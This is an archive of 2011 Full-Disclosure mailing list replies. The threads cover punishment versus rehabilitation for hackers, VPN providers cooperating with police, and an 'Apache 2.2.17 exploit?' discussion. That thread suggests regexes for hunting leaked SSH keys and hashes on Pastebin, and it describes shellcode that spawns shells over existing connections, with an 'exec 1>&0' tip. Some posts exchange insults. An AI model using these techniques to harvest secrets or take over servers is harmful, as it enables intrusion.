within >>> >>> >> size="3">>> size="4"> >>> >> size="3">>> size="4"> >>> >> size="3">>> size="4"> >>> >>> >> color="#414B56">>> ize="2"> >>> >>> the UK industry. >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Ok.. my final posts on this matter i think... and opinons, (No, seriously, I wonder what your opinions are on rehabilitative rather than punitative measures to be taken against criminal hackers, assuming fraud was *not* involved, and what benefit they can be to the community and whether it outweighs the negative effects of not making examples of them). It does outweigh, for, each time a perso is jailed it costs you, me, and anyone wh works, money. We can re3duce the harm, by education and counselling. Especially forced hours per-week basis, of counselling with a qualified psych, possibly before release even better. I think the IQ level is higher, therfore, there is a 'smarter' chance of it happening, asmuch as theyre hacking, theyre also gaining tremendus knoledge, many do go into IT sec, we just cannot see those cases really..and when we do, theyre usually yrs after the thing has happened, but, i could think of a few EU based guys who are hapily workin for huge co's, making massive cash, evven maker of Morphine, HolyFather, admittedly went into Av, and made rootkits for years. So, for sure, why put them in jail, it is just going to 'harden' , like anyone will when ones back is up against the wall, as it will be in jail ofc. I think rehab, rather than retalliate. Bedtme here for me :) I enjoy your posts, and i think the whole topic has much merit in these lists, other than just about a cpl of websites, pople forget that it is still about, the freedom to even, do a simple pentest , really thats the crux of it. So, i think,some method used by psychology, could very easily work, especially because, these guys are usually VERY smart, and, the can still be 'saved' unlike some hardened armed-robber/burglar... The chance of rehab, is specially high because of the intellectual platform it takes just to be at a simple or mediate level of the scale, in terms of 'hacking' in hgeneral. cheers, xd On 3 October 2011 22:17, Darren Martyn wrote: > Thanks for the input, I will be putting this as a debate soon for thew Law > Society in the Uni I attend, to see what the legal guys think. > > The issue in the example is not fraud, but damage done to the servers (lets > assume root/deface) and perhaps leaking of stolen data - the case I am using > as an example would be, for example, the "LulzSec" breaches. How hard would > they get f*cked on an international scale if arrested? How many countries > will try extradite them? > > In my opinion, they should be simply charged, tried and convicted in their > country of residence and be done with it - there is no benefit to society as > a whole to be gained from hanging them three or four times a piece, as I > reckon given a good shock and such, they come out with a newfound respect > for authority and may even be of some benefit to the security community and > the community as a whole. Locking them up merely turns them further toward > criminal lives - and remember, all hackers *have* potential to do good as > well as evil, it is just a matter of their choice. Given a *shove* toward > the right decision is more beneficial in the end. > > "Discuss"... > > (No, seriously, I wonder what your opinions are on rehabilitative rather > than punitative measures to be taken against criminal hackers, assuming > fraud was *not* involved, and what benefit they can be to the community and > whether it outweighs the negative effects of not making examples of them). > > On Mon, Oct 3, 2011 at 9:34 AM, xD 0x41 wrote: > >> Could just lok at the recent david cecil case here in .au. >> It does say alot, because he did breach some bigger networks.. and he was >> committing 'smaller' scale fraud but, still fraud, however, his main problem >> was what he did to a governemnt site, wich was deface it for personal gain, >> not profit. >> It is the latest case wich would be valid of this. >> still.. intresting infos... good stuff. >> xd >> >> >> On 3 October 2011 19:16, Darren Martyn > > wrote: >> >>> Going back to my own example, say all three are first world countries, >>> and A and C are in the EU whilst B is the US. All nations involved have good >>> diplomatic relations and preexisting extradition treaties, and to add >>> interest to it, lets say the LEO in B and C helped the investigation. The >>> criomes would be non-financial, but say, large scale hacks and such. I will >>> use Jake Davis's case as a "canary case" for this though... >>> >>> On Sun, Oct 2, 2011 at 12:31 AM, xD 0x41 wrote: >>> >>>> Ah, the legend of the mailing-list himself, has spoken. >>>> not knowing you, for all i have seen, your a pathetic sack of rubbish, >
Re: [Full-disclosure] VPN providers and any providers in general...
Well, statistics show that most crime is done on some form of drug, and drug addiction is probably about 90% of most major crime evens, so, i think this gives people of the IT nature, a much higher chance, staitstically speaking, it would be of more benfit to simply rehab them, rather than make them a possible statistic of the 'rotation' count most harder crims have. ok,. im out! xd On 3 October 2011 22:38, Darren Martyn wrote: > Well, thanks for the logical response :) > > Many people want these "evil hackers" locked up and such, but doing so will > only achieve the folowing (in my opinion): > A: Cost money. > B: Turn them into a more hardened criminal. > C: Cost the community a useful person who could be beneficial to them. > > Consider that Davis is 18, Cleary only 19, and other people arrested are > about the same age. What the law enforcement and judicial bodies dealing > with them must realize is that they are dealing with intelligent young > people, who simply chose the wrong path. What they need is not a prison > stay, but some rehabilitative treatment, perhaps councilling to help them > find the right path, and a better sense of morality. > > Hell, in some cases the mere arrest itself scared people straight. Having a > bloody SWAT team blow the bloody doors off is enough to reangline* most > young mens moral compass! > > Of course, jailing them can be used to "send a message" that "this is not > acceptable" and such, but that has *less* merit than *using* them for good. > All one does by sending a message is make those still out there feel more > persecuted, and persecuted people lash out, doing more damage, and the cycle > continues. > > *This computers spellcheck is not working, it wants to use Cyrillic! > > On Mon, Oct 3, 2011 at 12:28 PM, xD 0x41 wrote: > >> Ok.. my final posts on this matter i think... and opinons, >> >> >> (No, seriously, I wonder what your opinions are on rehabilitative rather >> than punitative measures to be taken against criminal hackers, assuming >> fraud was *not* involved, and what benefit they can be to the community and >> whether it outweighs the negative effects of not making examples of them). >> >> It does outweigh, for, each time a perso is jailed it costs you, me, and >> anyone wh works, money. >> We can re3duce the harm, by education and counselling. Especially forced >> hours per-week basis, of counselling with a qualified psych, possibly before >> release even better. >> I think the IQ level is higher, therfore, there is a 'smarter' chance of >> it happening, asmuch as theyre hacking, theyre also gaining tremendus >> knoledge, many do go into IT sec, we just cannot see those cases really..and >> when we do, theyre usually yrs after the thing has happened, but, i could >> think of a few EU based guys who are hapily workin for huge co's, making >> massive cash, evven maker of Morphine, HolyFather, admittedly went into Av, >> and made rootkits for years. >> So, for sure, why put them in jail, it is just going to 'harden' , like >> anyone will when ones back is up against the wall, as it will be in jail >> ofc. >> I think rehab, rather than retalliate. >> >> Bedtme here for me :) >> I enjoy your posts, and i think the whole topic has much merit in these >> lists, other than just about a cpl of websites, pople forget that it is >> still about, the freedom to even, do a simple pentest , really thats the >> crux of it. >> >> So, i think,some method used by psychology, could very easily work, >> especially because, these guys are usually VERY smart, and, the can still be >> 'saved' unlike some hardened armed-robber/burglar... >> The chance of rehab, is specially high because of the intellectual >> platform it takes just to be at a simple or mediate level of the scale, in >> terms of 'hacking' in hgeneral. >> cheers, >> xd >> >> >> >> >> On 3 October 2011 22:17, Darren Martyn > > wrote: >> >>> Thanks for the input, I will be putting this as a debate soon for thew >>> Law Society in the Uni I attend, to see what the legal guys think. >>> >>> The issue in the example is not fraud, but damage done to the servers >>> (lets assume root/deface) and perhaps leaking of stolen data - the case I am >>> using as an example would be, for example, the "LulzSec" breaches. How hard >>> would they get f*cked on an international scale if arrested? How many >>> countries will try extradite them? >>> >>> In my opinion, they should be simply
Re: [Full-disclosure] VPN providers and any providers in general...
Nice. Oh, i did not mean hackers and drugs, they are not really what I classify as a hardcore, criminalised addict who is now at the point where the drug runs them... most hard non-pc crimes, are this way. Although, i know of many many people who abuse benzodiazepedines, and thats where it can get only abit tricky to *speak* with them ;p , however, this does not classify to me, as a harder tyope, who would rip that computer outta your hand and take it to sale! Thats the crims i mean, and thats the reason why PC users have a much higher chance to not be any kind of 'repeat' addict... simply just they are not running around, daily, robbing things and people, (how would they use a pc...) and many actually, work at places. So, it is a rather good area to look at, because the chances of rehabbing a PC/IT user, is much much better than any harder criminal who has done say, 20yrs of theyre life (out of 25 yrs on earth), behind jail bars. Anyhow, i think alot of hackers do *abuse* but, not addicted, to drugs, wich makes me wonder why they do it, some i know, have to for medical reasons, and know this, and when under influence, usually jump offline or stay afk abit.. Some, just abuse at a low level with pills, but if you were to count IV users amongst hackers vs IV users amongst the public/crime scenes there, then you would have a very different sizing. Is good reading to look at a few cases, regarding drugged people committing crimes, and compare the statistics to the turn-about with jail, wich is probably 99% amongst the hardcore crims, rotation rate*. Anyhow, cheers! xd On 4 October 2011 01:10, Darren Martyn wrote: > Nothing "wrong" with it per se, I was known to enjoy large bottles of rum > during extended coding sessions. Now I can attest to the massive fall-off in > "epic skillz" associated with too much alcohol - my code starts OK, gets > better, then becomes an epic mess of typoes. I stopped doing that a while > back as I realized that it impaired my judgement too much. > > Computer crimes are far easier to commit when ones judgement is > sufficiently impaired - a lot of people I used to associate with took some > form of intoxicant and claimed it made them a "better hacker". (cannabis > often being one of the drugs of choice, some claim it allowed them to > "visualize" it all better...). I personally reckon that the real reason for > this is that it makes it easier to ignore the fact you are doing something > "wrong". > > TL;DR, intoxicants + misguided computer hackers = bad. > > On Mon, Oct 3, 2011 at 3:36 PM, Laurelai wrote: > >> On 10/3/2011 4:56 AM, Darren Martyn wrote: >> > True, I know some hackers who really apply the "Ballmers Peak" >> > (http://xkcd.com/323/) principle... They simply need to dry up :) >> > >> Yeah i know quite a few of those myself. >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
Hrm interesting.. I do Index of "/what-i-am-after" , in some different ways
and usually, find many 'dumps' of interesting scanners/kits/whatever.. have
not read most of it...archived tars now.. anyhow... interesting to maybe
make a 'catcher' for these thi8ngs, i was once trying todo a sniffer for
putty logins, but it failed :(
Anyhow, i like the regex idea.nice.
xd
On 4 October 2011 01:46, Dan Dart wrote:
> > I regularly trawl Pastebin.com to find code - often idiots leave some
> 0day
> > and similar there and it is nice to find.
>
> Make an RSS feed to regex through everything for "interesting" stuff..
>
> Maybe:
> /^[0-9a-f]{32}$/
>
> Or:
> /nuclear weapons/
>
> Or even:
> /^ssh-rsa/
>
> Would be brilliant!
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Reminds me of Front Page 2.0 gen'd code. lol, very true... it and a few other apps for web building, seem todo these kind of muckups or rather, just tag in an idiotic manner... pretty weird, I just stick with WP and hope i aint vuln ;p cheers, xd On 3 October 2011 23:39, Dave wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > On 03/10/2011 11:39, Jacqui Caren-home wrote: > > On 02/10/2011 18:38, Stefan Jon Silverman wrote: > >> oy, list newbie meets n3td3v -- this should be fun > > > > Just looked at this site. Shudder. > > > > FYI: this is PART of one sentence! > > This site should be linked to within the wikip definition of "tag soup" > :-) > > > > > > is a professional consu > > ltancy size="3"> > size="4"> > > size="3"> > size="4"> > > size="3"> > size="4"> > > > > size="3"> > > size="3"> > size="4"> > > size="3"> > size="4"> > > > > > > color="#414B56"> > ize="2"> > > offering business services to a wide range of clients within > > > size="3"> > size="4"> > > size="3"> > size="4"> > > size="3"> > size="4"> > > > > color="#414B56"> > ize="2"> > > > > the UK industry. > > > > Reminds me of Front Page 2.0 gen'd code. > > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.4.2 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ > > iQEVAwUBToms87Ivn8UFHWSmAQIysgf+P9oVoMydS2gfzYYUN4Z97+y0ZWnh7MZ7 > x9W3wjSFQGjM99Dv5owzXCOxi/FtnP3bRv2leR+DxZgeu4AFrp+S21czeqqzroRa > 1TwWwC9Xfbh9jTIVHowxdDFu7hbZAcYyAANcADmCC0YMT+zou1Vxy5ghZe1cJ2sq > Pla9VtsFvFutVg+vkmUGdInwLFmf/LRofydD+76KADukFwsDaD/3vf/JlCqkQuru > fl8WJIq2fer998fJDVwF85PyBLj2WJbFG5wP8DjO57iweojHJ/hvwr0jvWu6+o9e > Yuv23KqVP4YkvQsuxwL61hZXcWSsdDQrzljqYr37LyTC3Qu5jgCd8w== > =37gV > -END PGP SIGNATURE- > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
and i will find you :) he obv has a sshd scanner ready+waiting :) there is code tho... just NOT that 1. xd On 4 October 2011 01:54, adam wrote: > /* KEEP PRIV8&!&! leak and i will find you :) ~ desg */ > * > * > Probably should have been a good indication that he *wanted* you to run > it. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs wrote: > On Mon, Oct 3, 2011 at 10:35 PM, Laurelai wrote: > > On 10/3/2011 10:42 AM, Antony widmal wrote: > >> Using an external VPN provider to cover your trace clearly shows your > >> incompetency and your idiot assumption. > >> Trying to blame the VPN provider rather than accepting your mistake > >> and learning from it clearly show your 3 years old mentality. > >> > >> Also, could you please stop posting as GLOW Xd as well ? > >> We do not need your schizophrenic script kiddie "lolololol", "xD", > >> hugs, spamming on this mailing list. > >> > >> You being on this mailing list is once again not the best idea. > >> > >> Thanks, > >> Antony > > Actually XD and me are two different people. Second issues of privacy > > are always relevant, not understanding that law abiding individuals > > should always be concerned about companies that hand over personal info > > at the request of an authority figure are the ones with three year old > > mentalities. > > maybe they are law abiding companies? :) > this whole fuss wouldn't have happened, if everybody could just stay a > law abiding citizen. > > -- > Ferenc Kovács > @Tyr43l - http://tyrael.hu > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
here are places like codepad.org that let you compile/execute various Indeed, i have seen the codepad.org execute action used on many many bots, even opastebin just using download= and, renaming the downloaded file :s not to hard, dfont even need to rename file, and, raw= featuires, is plain code just in a txt. on codepad tho, you can actually execute the code on the server, and, thats awesome for debugging i guess but, i prefer to use my own stdinout. anyhow, it is a nice world there, that is where half the bots in use sit... you should find some of the more popular botz, and strings, and watch howmany are active...many would be, believ it. specially on pastebin and codepad , those two are best because allow sraw download.. but, codepad, even allows you to setup a subdomain wich was removed from the pastebin , unf.. ohwell, thats how it is, it is ok by me. xd On 4 October 2011 07:14, adam wrote: > Darren, > > There are places like codepad.org that let you compile/execute various > programming/scripting languages, of course you don't have the control/access > that you'd normally have but for some things - it may just be enough. > > On Mon, Oct 3, 2011 at 11:41 AM, Darren Martyn < > d.martyn.fulldisclos...@gmail.com> wrote: > >> I may have to set up such an RSS + REGEX along with a google alerts to get >> the best of both :) >> >> Since my lack of computing facilities has gotten worse in the last month I >> have actually begun to forget ASM, so decoding shellcode is not so easy for >> me :( >> Nor do I have (currently) access to a Linux box to test it on - only a >> friends W7 laptop (which wants to use Cyrillic) and the college computers >> (W7 also... Network booting with Novell, buggy and slow for the win!) >> >> I will keep on posting anything that looks even mildly interesting, may >> find something fun in my travels :) >> >> >> On Mon, Oct 3, 2011 at 5:05 PM, PsychoBilly wrote: >> >>> OMG! >>> This ... >>> actually WORKS! >>> GR8 Job, m8+! >>> L33+ cC l33+ >>> W00+ FB Bwana! >>> ... >>> >>> >>> [[ adam ]] @ [[ 03/10/2011 17:56 >>> ]]-- >>> > Also, make sure you guys don't miss out on this 0day either: >>> http://pastebin.com/R8XdsUgK >>> > >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
You are an idiot. On 4 October 2011 04:42, Antony widmal wrote: > Using an external VPN provider to cover your trace clearly shows your > incompetency and your idiot assumption. > Trying to blame the VPN provider rather than accepting your mistake and > learning from it clearly show your 3 years old mentality. > > Also, could you please stop posting as GLOW Xd as well ? > We do not need your schizophrenic script kiddie "lolololol", "xD", hugs, > spamming on this mailing list. > > You being on this mailing list is once again not the best idea. > > Thanks, > Antony > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Honestly, i dont use VPN, dont know alot about them, but when a company says " we will hide you..come to us.. " , i guess some people take this, as a meaning that they can commit crime, wich is obviously not the case... I dont use VPN, I dont believe in them, i dont need them, and, I am NOT laurelai for the final time i will say to that idiotic kid trying to say i am, I do not speak in "lololo" , and anyone who knows me, would know i aint her/him, whoever it is. Anyhow, yes, well... i am slowly seeing that obviously, appearances can be very decieving , but then again, I would not expect to get away with crime on *any* service nowdays, it is crime afterall... and it is on the grander scale, according to press even, wich pushes it forward even harder.. anyhow, nite time here, sleeping time... but i will wake to a million emails i guess again :s it is a good tiopic, but also not an excuse for people to start putting up "free *blah*" and such, because some of these cases simply CANNOT be helped, by law... thats just how it is in some countries, they are stricter (once arrested), than when i guess some other countries are.. regarding europe, and arabic areas, and the jails there... i can only say, each case must be looked at very closesly, and then maybe see why in each case, athe arrest wasmade, and maybe there is some pattern... (the press...mainly). cheers,and gnite, xd On 4 October 2011 20:27, Darren Martyn wrote: > Ok, well I suppose we can avoid spamming the list with our off topic > ramblings and get back to the topic on hand (and behave like adults, which I > assume all of you'se are), and clear up a few things up. > > VPN's and such can serve as a method to stop people on the local network > from sniffing your connection (assuming a reliable encryption scheme is in > place, and you have not been MITM-ed during the key exchange or whatever - > crypto is NOT my interest!). However, we can reliably assume that the VPN > provider can sniff your connection and compromise your "safety" per se, and > that they WILL cooperate with Law Enforcement. > > Even running your own VPN (OpenVPN) on a VPS you purchase is still risky, > as the VPS provider can simply take over the box. Etc. > > TL;DR, VPN's are not as safe as some believe for protecting ones anonymity. > They WILL roll over for LEO and such. Not to mention threats on the LAN > could compromise you, but I do not know much about how that works on the > crypto side (however, if someone wants to enlighten me I would be grateful, > it has piqued my curiosity!) > > Also, NOT surprised the provider rolled over in THAT case. > > *footnote for Christian, etc. I apologise for inciting a bit of off topic > ranting, merely discussing morals, and how they affect people, and how often > people do silly things when their logic/morality is compromised, often by > narcotics and such. But that is for a discussion on morals and the > psychology/sociology of "cybercriminals". The ensuing debate about > psychadelics and coding was probably my fault, but hey, people have varied > interests, no? If we are going to act our age (adults, I presume) on this > list at least display some tolerance for other peoples discussions, and keep > the anger off the list. > > On Tue, Oct 4, 2011 at 8:06 AM, Ferenc Kovacs wrote: > >> http://vpn.hidemyass.com/vpncontrol/legal.html >> >> "VPN Data >> >> What we store: Time stamp and IP address when you connect and >> disconnect to our service." >> >> ... >> >> "Legalities >> >> Anonymity services such as ours do not exist to hide people from >> illegal activity. We will cooperate with law enforcement agencies if >> it has become evident that your account has been used for illegal >> activities." >> >> people should read the TOC, AUP and privacy policy especially if they >> are planning to use that service for illegal activities. >> >> As I mentioned before it is hard to expect that a VPN provider will >> risk his company for your $11.52/month, and maybe they would try it >> for some lesser case, but what Lulsec did was grant, so I'm not >> surprised that they bent. >> >> On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 wrote: >> > maybe they are law abiding companies? :) >> > >> > Who were advertising themselves, and acting like they would NEVER do the >> > dirty by handing over any payment records etc... wich is half the reason >> i >> > believe the people use theose ones, advertising to protect you.. not to >> give >> > your infos up, for really, no reason. as they did. >> > Law abiding or not, then they should be advertising as a l
Re: [Full-disclosure] VPN providers and any providers in general...
On the piratebay.org dilemma for isps, i found this posted just *now* (10pm,australian time) Belgian ISPs Ordered To Block The Pirate Bay - http://feed.torrentfreak.com/~r/Torrentfreak/~3/FMfrUHk1sZM/ Interesting developments regarding this.. I am using the RSS feed on TF to keepup qwith this case seems it has taken a sharp u-turn! headsup! xd On 4 October 2011 18:06, Ferenc Kovacs wrote: > http://vpn.hidemyass.com/vpncontrol/legal.html > > "VPN Data > > What we store: Time stamp and IP address when you connect and > disconnect to our service." > > ... > > "Legalities > > Anonymity services such as ours do not exist to hide people from > illegal activity. We will cooperate with law enforcement agencies if > it has become evident that your account has been used for illegal > activities." > > people should read the TOC, AUP and privacy policy especially if they > are planning to use that service for illegal activities. > > As I mentioned before it is hard to expect that a VPN provider will > risk his company for your $11.52/month, and maybe they would try it > for some lesser case, but what Lulsec did was grant, so I'm not > surprised that they bent. > > On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 wrote: > > maybe they are law abiding companies? :) > > > > Who were advertising themselves, and acting like they would NEVER do the > > dirty by handing over any payment records etc... wich is half the reason > i > > believe the people use theose ones, advertising to protect you.. not to > give > > your infos up, for really, no reason. as they did. > > Law abiding or not, then they should be advertising as a law abiding > > company, and not acting like some hackers-oparadise vpn service. > > xd > > > > > > On 4 October 2011 06:16, Ferenc Kovacs wrote: > >> > >> On Mon, Oct 3, 2011 at 10:35 PM, Laurelai > wrote: > >> > On 10/3/2011 10:42 AM, Antony widmal wrote: > >> >> Using an external VPN provider to cover your trace clearly shows your > >> >> incompetency and your idiot assumption. > >> >> Trying to blame the VPN provider rather than accepting your mistake > >> >> and learning from it clearly show your 3 years old mentality. > >> >> > >> >> Also, could you please stop posting as GLOW Xd as well ? > >> >> We do not need your schizophrenic script kiddie "lolololol", "xD", > >> >> hugs, spamming on this mailing list. > >> >> > >> >> You being on this mailing list is once again not the best idea. > >> >> > >> >> Thanks, > >> >> Antony > >> > Actually XD and me are two different people. Second issues of privacy > >> > are always relevant, not understanding that law abiding individuals > >> > should always be concerned about companies that hand over personal > info > >> > at the request of an authority figure are the ones with three year old > >> > mentalities. > >> > >> maybe they are law abiding companies? :) > >> this whole fuss wouldn't have happened, if everybody could just stay a > >> law abiding citizen. > >> > >> -- > >> Ferenc Kovács > >> @Tyr43l - http://tyrael.hu > >> > >> ___ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > Ferenc Kovács > @Tyr43l - http://tyrael.hu > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
Are there any ideas how to make the code more robust (currently raciness due to frequent syscalls is problematid), smaller or add features (I thought using the libc GOT, but this made code larger and I do not know if that would make code much more portable)? What about using libcurl/curlsetopt_url and the other curl options On 5 October 2011 08:26, halfdog wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Just for those, who want to build their own apache shell code for > testing purposes, this snip might be of some use. It uses the still > open tcp connections to the server to spawn the shells, so that no > backconnect is needed. Of course, it does not give remote root but > only httpd user privs. And you should send "exec 1>&0" as first > command if you want to see remote shell stdout. > > > Are there any ideas how to make the code more robust (currently > raciness due to frequent syscalls is problematid), smaller or add > features (I thought using the libc GOT, but this made code larger and > I do not know if that would make code much more portable)? > > > PS: There is no use to compile or run it, it is just embedded into .c > file for compilation (too lazy to look up gcc args for .S assem) > before insertion into vectors. > > - -- > http://www.halfdog.net/ > PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFOi3nbxFmThv7tq+4RAv8cAJ4tR3T2Ssx8SOYr5eDqX5OYqNyhmgCfbjd1 > f9X896pIjKEn/l/3ZLv1Ha8= > =5K0l > -END PGP SIGNATURE- > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Supporting it would then mean, i guess there would be some kind of neat cyber attacks happening on wall street major shareholders :P or is it peaceful, sit in like this time ;P hehe.. On 5 October 2011 01:34, Laurelai Storm wrote: > I believe they are supporting it. > On Oct 4, 2011 9:29 AM, "Georgi Guninski" wrote: > > On Mon, Oct 03, 2011 at 02:22:42PM -0700, Laurelai wrote: > >> What tears? I don't even use those providers. > > > > What a nice drivel in this thread :))) > > > > btw, are Anonymous affiliated/supporting the usa protests aka > "OccupyWallStreet"? > > > > all the usa needs is a revolution just before they go bankrupt :) > > > > -- > > joro > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
There is ways to make it*say* things, like show system info etc on stdout, without using that bug.. lookup a decent connectback shell, most perl ones have fine stdinout and use printf or other means.. On 5 October 2011 08:39, Kai wrote: > Hi halfdog, > > > Just for those, who want to build their own apache shell code for > > testing purposes, this snip might be of some use. It uses the still > > open tcp connections to the server to spawn the shells, so that no > > backconnect is needed. Of course, it does not give remote root but > > only httpd user privs. And you should send "exec 1>&0" as first > > command if you want to see remote shell stdout. > > wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915 > ---> https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 > sorry if i'm talking about different thing. > > -- > Cheers, > > Kai > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
could be used a very handy 'bind' shell tho... On 5 October 2011 08:51, Andrew Farmer wrote: > On 2011-10-04, at 14:39, Kai wrote: > > Hi halfdog, > > > >> Just for those, who want to build their own apache shell code for > >> testing purposes, this snip might be of some use. It uses the still > >> open tcp connections to the server to spawn the shells, so that no > >> backconnect is needed. Of course, it does not give remote root but > >> only httpd user privs. And you should send "exec 1>&0" as first > >> command if you want to see remote shell stdout. > > > > wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915 > > ---> https://issues.apache.org/bugzilla/show_bug.cgi?id=46425 > > sorry if i'm talking about different thing. > > It's a generic method of getting a shell set up once you have code > execution, not an exploit for any specific bug. > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
haha very true but, still a very good/easy and, often used as example code, but, yes most are assignments usually :s and, actually seen as a featre for some people, who like , tend to forget passes rofl :P On 5 October 2011 11:53, wrote: > On Wed, 05 Oct 2011 08:55:07 +1100, xD 0x41 said: > > > could be used a very handy 'bind' shell tho... > > I swear, bind shell code is like "Our Friend The Beaver" school essay > assignments - everybody ends up writing one, they all look the same, and > almost > none are any good. ;) > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
